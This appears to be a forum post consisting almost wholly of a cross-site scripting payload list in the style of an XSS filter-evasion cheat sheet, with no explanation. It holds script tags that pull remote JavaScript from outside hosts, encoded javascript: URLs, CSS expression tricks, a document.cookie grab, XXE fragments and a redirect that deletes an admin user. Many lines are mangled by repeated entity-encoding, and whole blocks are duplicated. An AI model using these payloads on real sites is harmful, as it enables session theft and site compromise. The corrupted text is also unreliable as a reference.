&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;

<SCRIPT SRC=ha.ckers.org/xss.js

<SCRIPT SRC=//ha.ckers.org/.j>

&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;

<IFRAME SRC=ha.ckers.org/scriptlet.html <

&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;

&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;

&lt;SCRIPT&gt;a=/XSS/

<SCRIPT a=">" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT ="blah" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a="blah" '' SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT "a='>'" SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=`>` SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT a=">'>" SRC="ha.ckers.org/xss.js"></SCRIPT>

&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;

&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;

<A HREF="//www.google.com/">XSS</A>

&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;

<A HREF="ha.ckers.org@google">XSS</A>

<A HREF="http://google:ha.ckers.org">XSS</A>

<A HREF="google.com/">XSS</A>

<A HREF="www.google.com./">XSS</A>

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

<A HREF="www.gohttp://www.google.com/ogle.com/">XSS</A>

document.vulnerable=true;

document.vulnerable=true;//

document.vulnerable=true;

<img SRC="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a>"

<iframe src="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a> <

a=/XSS/\ndocument.vulnerable=true;

\";document.vulnerable=true;;//

document.vulnerable=true;

li {list-style-image: url("javascript:document.vulnerable=true;");XSS

1script3document.vulnerable=true;1/script3

@im\port'\ja\vasc\ript:document.vulnerable=true';

exp/*

document.vulnerable=true;

.XSS{background-image:url("javascript:document.vulnerable=true");}

BODY{background:url("javascript:document.vulnerable=true")}

document.vulnerable=true;

]]

cript:document.vulnerable=true">

document.vulnerable=true">

document.vulnerable=true'); ?>

document.vulnerable=true">

+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&document.vulnerable=true;

&{document.vulnerable=true;};

document.vulnerable=true;">

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

" onmouseover="document.vulnerable=true;">

document.vulnerable=true;;

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

@import'www.securitycompass.com/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}

XSS

'"-->

" SRC="www.securitycompass.com/xss.js">

" SRC="www.securitycompass.com/xss.js">

" '' SRC="www.securitycompass.com/xss.js">

'" SRC="www.securitycompass.com/xss.js">

` SRC="www.securitycompass.com/xss.js">

'>" SRC="www.securitycompass.com/xss.js">

document.write("PT SRC="www.securitycompass.com/xss.js">

[Mozilla]

&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;

&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;

&lt;/br style=a:expression(alert())&gt;

&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;

&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;

perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out

perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out

">alert('XSS')

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;;";>;';>;;alert(String.fromCharCode(88,83,83));

';';;!--";;=&;{()}

;alert(';XSS';);

;;

;alert(String.fromCharCode(88,83,83));

;;;

;;

Redirect 302 /a.jpg victimsite.com/admin.asp&;deleteuser

exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);

;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);};;;XSS

;;

%BCscript%BEalert(%A2XSS%A2)%BC/script%BE

;;

;;;

;;

a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);

;alert(';XSS';);;

;.XSS{background-image:url(";javascript:alert(';XSS';)";);};;;

;BODY{background:url(";javascript:alert(';XSS';)";)};

;@import';ha.ckers.org/xss.css';;;

;; REL=stylesheet";>;

;BODY{-moz-binding:url(";ha.ckers.org/xssmoz.xml#xss";)};

;;

;;;;

;;;;;]]>;

;;;;cript:alert(';XSS';)";>;;;;

;;

;;

;alert(';XSS';);";>;

;;

;;;';";-->;

<;? echo(';<;SCR)';;

;; ;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-

\";;alert(';XSS';);//

;;alert("XSS");;

;@im\port';\ja\vasc\ript:alert(";XSS";)';;;

;&#x0D;

perl -e ';print ";";;';>; out

perl -e ';print ";&;;alert(";XSS";);";;'; >; out

;;

<;SCRIPT SRC=<a href="http://ha.ckers.org/xss.js" target="_blank" rel="nofollow">ha.ckers.org/xss.js</a>

<;IMG SRC=";javascript:alert(';XSS';)";

<;IFRAME SRC=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <;

;alert(";XSS";);//;

;;alert(";XSS";);";>;

;a=/XSS/

;"; SRC=";ha.ckers.org/xss.js";>;;

;;

;;

;';"; SRC=";ha.ckers.org/xss.js";>;;

;` SRC=";ha.ckers.org/xss.js";>;;

;document.write(";;PT SRC=";ha.ckers.org/xss.js";>;;

';>"; SRC=";ha.ckers.org/xss.js";>;;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

;XSS;

document.vulnerable=true;

document.vulnerable=true;//

document.vulnerable=true;

<img SRC="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a>"

<iframe src="javascript:<a href="http://document.vulnerable=true;" target="_blank" rel="nofollow">document.vulnerable=true;</a> <

a=/XSS/\ndocument.vulnerable=true;

\";document.vulnerable=true;;//

document.vulnerable=true;

li {list-style-image: url("javascript:document.vulnerable=true;");XSS

1script3document.vulnerable=true;1/script3

@im\port'\ja\vasc\ript:document.vulnerable=true';

exp/*

document.vulnerable=true;

.XSS{background-image:url("javascript:document.vulnerable=true");}

BODY{background:url("javascript:document.vulnerable=true")}

document.vulnerable=true;

]]

cript:document.vulnerable=true">

document.vulnerable=true">

document.vulnerable=true'); ?>

document.vulnerable=true">

+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-

&document.vulnerable=true;

&{document.vulnerable=true;};

document.vulnerable=true;">

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

document.vulnerable=true;//-->

document.vulnerable=true;

" onmouseover="document.vulnerable=true;">

document.vulnerable=true;;

[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

@import'www.securitycompass.com/xss.css';

; REL=stylesheet">

BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}

XSS

'"-->

" SRC="www.securitycompass.com/xss.js">

" SRC="www.securitycompass.com/xss.js">

" '' SRC="www.securitycompass.com/xss.js">

'" SRC="www.securitycompass.com/xss.js">

` SRC="www.securitycompass.com/xss.js">

'>" SRC="www.securitycompass.com/xss.js">

document.write("PT SRC="www.securitycompass.com/xss.js">

[Mozilla]

";>;;

;;alert(1);

;alert(1);

perl -e &#039;print \";;\";;&#039; >; out

perl -e &#039;print \";;alert(\";XSS\";);\";;&#039; >; out

">alert('XSS')

XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

XSS STYLE=xss:e/**/xpression(alert('XSS'))>

>">alert("XSS")&

">@import"javascript:alert('XSS')";

>"'>

>%22%27>

'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'

'';!--"=&{()}

&quot;)>

#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41>

#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

'XSS');">

'XSS');">

var n=0;while(true){n++;}]]>

SCRIPT]]>alert('gotcha');/SCRIPT]]>

]>&xee;

]>&xee;

]>&xee;

]>&xee;

alert('XSS')

%3cscript%3ealert('XSS')%3c/script%3e

%22%3e%3cscript%3ealert('XSS')%3c/script%3e

alert("XSS")">

<IMG SRC="javascript:alert('XSS')"

<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <

alert("XSS");//

%253cscript%253ealert(1)%253c/script%253e

">alert(document.cookie)

fooalert(1)

ipt>alert(1)ipt>

Commented link: /beta2

Date:

Fórum id: 748829

Sysoon Fórum No: 748829, Author: Picapica Pica.
